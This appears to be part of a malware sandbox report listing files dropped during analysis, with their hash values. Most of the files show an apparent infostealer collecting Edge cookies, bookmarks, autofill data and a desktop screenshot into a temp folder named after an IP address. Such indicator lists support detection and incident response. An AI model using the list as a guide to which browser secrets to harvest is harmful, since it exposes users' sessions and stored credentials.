C:\Users\Admin\AppData\Local\Temp\212.102.63.147\Browsers\Edge\EdgeCookies.txt

MD5 964d5571d9a4fec576fe454162f2e844
SHA1 6234d1102a5012094dc8818bc045f7890d270905
SHA256 6cfad5b342f80a79633747ee591775dbf46be34fbc793930e5de9aab7afb9995
SHA512 402b81b47e62fa0d2b993eb01df725d1f3ec826ed76c0ac17d5ebaed048e6c7556ac2e1b3c0141e2347386cb5c7c74377c37f990ba9b5745f388181153b8a46c

C:\Users\Admin\AppData\Local\Temp\212.102.63.147\Browsers\Edge\EdgeBookmarks.txt

MD5 c5b94f01b5b97e31f9cec28fecefe0b1
SHA1 5a2f650235d6319696f02a10a0393b47dbddcd81
SHA256 bf9eec15e97a4addb7f3b9a15f2de3b5499428750e3ecf1cbad5e3bad5e00548
SHA512 8e6a75963a9e613ee3a5fe4032c42898904426c19541ec54404811482ef8aac4f84ff23bd80d72f0d33215dcde7d008fcd4687c79ba35cac5b4240c5ad5b109b

C:\Users\Admin\AppData\Local\Temp\212.102.63.147\Browsers\Edge\EdgeAutoFill.txt

MD5 f19d961388cd1c4572942a4f1397d15d
SHA1 95a89992f4fe50c0a6f4351c3f93c14487087844
SHA256 052caba139f51903bc4994a3cace4e65c87fd093b6efec8141e4a6c4625e380d
SHA512 66a82f3216189a50df4ca19194a1eda2989e6635fc115508d9c0b2a33b3345f657a17214c52ed78999eb8a3e571199e70c3ae4854deaa7eb1f380af7f6f8fb09

C:\Users\Admin\AppData\Local\Temp\212.102.63.147\DesktopScreenshot.png

MD5 3625ed17a6255827969ad5a404f0e41e
SHA1 87922c687d7c31aef6b20da03c4621b03a617028
SHA256 c7fcc119a5fcf6b96a186e837887c22c2d1b59de5fb3c263911843f9cc6b9be3
SHA512 4bd2de013dad5a094a3a28fe171fc0ebe97dfcda5413fc3d0d1f0aced57cc892d0a0835708e42cae720c71befa02604590638cc9ba2f4b260abf14b5d67bfc16

C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\BackgroundTransferApi\267aad0b-2fdd-4292-8bff-59b3a5d8a384.down_data

MD5 5683c0028832cae4ef93ca39c8ac5029
SHA1 248755e4e1db552e0b6f8651b04ca6d1b31a86fb
SHA256 855abd360d8a8d6974eba92b70cbd09ce519bc8773439993f9ab37cb6847309e
SHA512 aba434bd29be191c823b02ea9b639beb10647bbe7759bbffdaa790dfb1ec2c58d74c525ef11aacda209e4effe322d1d3a07b115446c8914b07a3bce4d8a0e2c3